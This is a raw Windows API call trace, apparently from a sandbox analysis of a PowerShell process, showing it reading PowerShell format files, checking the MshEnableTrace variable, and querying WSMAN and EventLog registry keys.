	[0659.376] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x7a4d6bbc, Data2=0x2b20, Data3=0x4058, Data4=([0]=0xa8, [1]=0xa8, [2]=0xdd, [3]=0x3c, [4]=0xa3, [5]=0xfc, [6]=0xa8, [7]=0xd7))) returned 0x0
	[0659.377] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0659.377] GetFileType (hFile=0x324) returned 0x1
	[0659.377] SetErrorMode (uMode=0x1) returned 0x1
	[0659.377] GetFileType (hFile=0x324) returned 0x1
	[0659.377] ReadFile (in: hFile=0x324, lpBuffer=0x2fb3850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2fb3850*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0661.056] ReadFile (in: hFile=0x324, lpBuffer=0x2fb3850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2fb3850*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0661.056] ReadFile (in: hFile=0x324, lpBuffer=0x2fb3850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2fb3850*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0661.056] ReadFile (in: hFile=0x324, lpBuffer=0x2fb3850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2fb3850*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0661.056] ReadFile (in: hFile=0x324, lpBuffer=0x2fb3850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2fb3850*, lpNumberOfBytesRead=0x26d038*=0x8b4, lpOverlapped=0x0) returned 1
	[0661.057] ReadFile (in: hFile=0x324, lpBuffer=0x2fb2c6c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2fb2c6c*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0661.057] ReadFile (in: hFile=0x324, lpBuffer=0x2fb3850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2fb3850*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0661.057] CloseHandle (hObject=0x324) returned 1
	[0661.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0661.057] SetErrorMode (uMode=0x1) returned 0x1
	[0661.057] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfe0 | out: lpFileInformation=0x26cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0661.058] SetErrorMode (uMode=0x1) returned 0x1
	[0661.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0661.058] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0c8 | out: phkResult=0x26d0c8*=0x324) returned 0x0
	[0661.058] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d04c, lpData=0x0, lpcbData=0x26d048*=0x0 | out: lpType=0x26d04c*=0x1, lpData=0x0, lpcbData=0x26d048*=0x56) returned 0x0
	[0661.058] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35c80
	[0661.058] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d01c, lpData=0x1ba35c80, lpcbData=0x26d018*=0x56 | out: lpType=0x26d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d018*=0x56) returned 0x0
	[0661.058] CoTaskMemFree (pv=0x1ba35c80) 
	[0661.058] RegCloseKey (hKey=0x324) returned 0x0
	[0661.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0661.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0661.059] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x57cda244, Data2=0x1501, Data3=0x4de2, Data4=([0]=0xbe, [1]=0x73, [2]=0xae, [3]=0xab, [4]=0xb3, [5]=0x70, [6]=0x93, [7]=0x6f))) returned 0x0
	[0661.060] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0xd466f8e3, Data2=0xce04, Data3=0x431b, Data4=([0]=0x80, [1]=0xc0, [2]=0xff, [3]=0xea, [4]=0xff, [5]=0xa4, [6]=0x13, [7]=0x52))) returned 0x0
	[0661.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0661.061] SetErrorMode (uMode=0x1) returned 0x1
	[0661.061] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0661.061] GetFileType (hFile=0x324) returned 0x1
	[0661.061] SetErrorMode (uMode=0x1) returned 0x1
	[0661.061] GetFileType (hFile=0x324) returned 0x1
	[0661.061] ReadFile (in: hFile=0x324, lpBuffer=0x2ff1638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ff1638*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0661.067] ReadFile (in: hFile=0x324, lpBuffer=0x2ff1638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ff1638*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0661.067] ReadFile (in: hFile=0x324, lpBuffer=0x2ff1638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ff1638*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0661.068] ReadFile (in: hFile=0x324, lpBuffer=0x2ff1638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ff1638*, lpNumberOfBytesRead=0x26d038*=0x1000, lpOverlapped=0x0) returned 1
	[0661.068] ReadFile (in: hFile=0x324, lpBuffer=0x2ff1638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ff1638*, lpNumberOfBytesRead=0x26d038*=0xe98, lpOverlapped=0x0) returned 1
	[0661.068] ReadFile (in: hFile=0x324, lpBuffer=0x2ff0c38, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ff0c38*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0661.068] ReadFile (in: hFile=0x324, lpBuffer=0x2ff1638, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d038, lpOverlapped=0x0 | out: lpBuffer=0x2ff1638*, lpNumberOfBytesRead=0x26d038*=0x0, lpOverlapped=0x0) returned 1
	[0661.068] CloseHandle (hObject=0x324) returned 1
	[0661.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0661.069] SetErrorMode (uMode=0x1) returned 0x1
	[0661.069] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfe0 | out: lpFileInformation=0x26cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0661.069] SetErrorMode (uMode=0x1) returned 0x1
	[0661.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0661.069] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0c8 | out: phkResult=0x26d0c8*=0x324) returned 0x0
	[0661.069] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d04c, lpData=0x0, lpcbData=0x26d048*=0x0 | out: lpType=0x26d04c*=0x1, lpData=0x0, lpcbData=0x26d048*=0x56) returned 0x0
	[0661.069] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35c80
	[0661.069] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d01c, lpData=0x1ba35c80, lpcbData=0x26d018*=0x56 | out: lpType=0x26d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d018*=0x56) returned 0x0
	[0661.070] CoTaskMemFree (pv=0x1ba35c80) 
	[0661.070] RegCloseKey (hKey=0x324) returned 0x0
	[0661.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0661.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0661.071] VirtualQuery (in: lpAddress=0x26bb60, lpBuffer=0x26ca20, dwLength=0x30 | out: lpBuffer=0x26ca20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0661.072] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x526e5c85, Data2=0xca7e, Data3=0x4061, Data4=([0]=0x8e, [1]=0x29, [2]=0xea, [3]=0x3e, [4]=0x97, [5]=0xf5, [6]=0xa0, [7]=0xed))) returned 0x0
	[0661.072] CoCreateGuid (in: pguid=0x26d2f0 | out: pguid=0x26d2f0*(Data1=0x21fbffa4, Data2=0x6d96, Data3=0x493b, Data4=([0]=0xa0, [1]=0x15, [2]=0x86, [3]=0xfb, [4]=0xac, [5]=0x7f, [6]=0x96, [7]=0xae))) returned 0x0
	[0661.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0661.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0664.316] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0664.316] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.317] CoTaskMemFree (pv=0x44bd30) 
	[0664.318] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0664.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.318] CoTaskMemFree (pv=0x44bd30) 
	[0664.320] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0664.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.320] CoTaskMemFree (pv=0x44bd30) 
	[0664.321] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0664.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.321] CoTaskMemFree (pv=0x44bd30) 
	[0664.333] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0664.333] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.333] CoTaskMemFree (pv=0x44bd30) 
	[0664.336] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0664.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.336] CoTaskMemFree (pv=0x44bd30) 
	[0664.336] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0664.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.337] CoTaskMemFree (pv=0x44bd30) 
	[0664.343] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2d8 | out: phkResult=0x26d2d8*=0x324) returned 0x0
	[0665.736] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d1dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d1dc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1d8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0665.736] CoTaskMemFree (pv=0x0) 
	[0665.737] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0665.737] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x3d5480, lpcchValueName=0x26d288, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d288, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0665.737] CoTaskMemFree (pv=0x3d5480) 
	[0665.737] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0665.738] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x3d5480, lpcchValueName=0x26d288, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d288, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0665.738] CoTaskMemFree (pv=0x3d5480) 
	[0665.738] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0665.738] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x3d5480, lpcchValueName=0x26d288, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d288, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0665.738] CoTaskMemFree (pv=0x3d5480) 
	[0665.739] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d26c, lpData=0x0, lpcbData=0x26d268*=0x0 | out: lpType=0x26d26c*=0x1, lpData=0x0, lpcbData=0x26d268*=0x8) returned 0x0
	[0665.739] CoTaskMemAlloc (cb=0xc) returned 0x448530
	[0665.739] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d23c, lpData=0x448530, lpcbData=0x26d238*=0x8 | out: lpType=0x26d23c*=0x1, lpData="2.0", lpcbData=0x26d238*=0x8) returned 0x0
	[0665.739] CoTaskMemFree (pv=0x448530) 
	[0667.599] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d228 | out: phkResult=0x26d228*=0x2fc) returned 0x0
	[0667.599] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d12c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d128, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d12c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d128*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0667.599] CoTaskMemFree (pv=0x0) 
	[0667.599] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0667.599] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x3d5480, lpcchValueName=0x26d1d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d1d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0667.599] CoTaskMemFree (pv=0x3d5480) 
	[0667.599] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0667.599] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x3d5480, lpcchValueName=0x26d1d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d1d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0667.599] CoTaskMemFree (pv=0x3d5480) 
	[0667.599] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0667.599] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x3d5480, lpcchValueName=0x26d1d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d1d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0667.599] CoTaskMemFree (pv=0x3d5480) 
	[0667.600] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d1bc, lpData=0x0, lpcbData=0x26d1b8*=0x0 | out: lpType=0x26d1bc*=0x1, lpData=0x0, lpcbData=0x26d1b8*=0x8) returned 0x0
	[0667.600] CoTaskMemAlloc (cb=0xc) returned 0x4485d0
	[0667.600] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d18c, lpData=0x4485d0, lpcbData=0x26d188*=0x8 | out: lpType=0x26d18c*=0x1, lpData="2.0", lpcbData=0x26d188*=0x8) returned 0x0
	[0667.600] CoTaskMemFree (pv=0x4485d0) 
	[0667.601] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0667.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0667.601] CoTaskMemFree (pv=0x44bd30) 
	[0667.608] CoTaskMemAlloc (cb=0x104) returned 0x44bd30
	[0667.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44bd30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0667.608] CoTaskMemFree (pv=0x44bd30) 
	[0667.614] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d258 | out: phkResult=0x26d258*=0x300) returned 0x0
	[0667.618] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d1cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d1cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0667.618] CoTaskMemFree (pv=0x0) 
	[0667.619] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0667.619] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x0, lpName=0x3d5480, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0667.619] CoTaskMemFree (pv=0x3d5480) 
	[0667.619] CoTaskMemFree (pv=0x0) 
	[0667.619] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0667.619] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x1, lpName=0x3d5480, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0667.619] CoTaskMemFree (pv=0x3d5480) 
	[0667.619] CoTaskMemFree (pv=0x0) 
	[0667.619] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0667.619] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x2, lpName=0x3d5480, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0667.619] CoTaskMemFree (pv=0x3d5480) 
	[0667.619] CoTaskMemFree (pv=0x0) 
	[0667.619] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0667.619] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x3, lpName=0x3d5480, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0667.620] CoTaskMemFree (pv=0x3d5480) 
	[0667.620] CoTaskMemFree (pv=0x0) 
	[0667.620] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0667.620] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x4, lpName=0x3d5480, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0667.620] CoTaskMemFree (pv=0x3d5480) 
	[0667.620] CoTaskMemFree (pv=0x0) 
	[0667.620] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0667.620] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x5, lpName=0x3d5480, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0667.620] CoTaskMemFree (pv=0x3d5480) 
	[0667.620] CoTaskMemFree (pv=0x0) 
	[0667.620] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0667.620] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x6, lpName=0x3d5480, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0667.620] CoTaskMemFree (pv=0x3d5480) 
	[0669.544] CoTaskMemFree (pv=0x0) 
	[0669.544] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0669.544] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x7, lpName=0x3d5480, lpcchName=0x26d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0669.545] CoTaskMemFree (pv=0x3d5480) 
	[0669.545] CoTaskMemFree (pv=0x0) 
	[0669.545] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
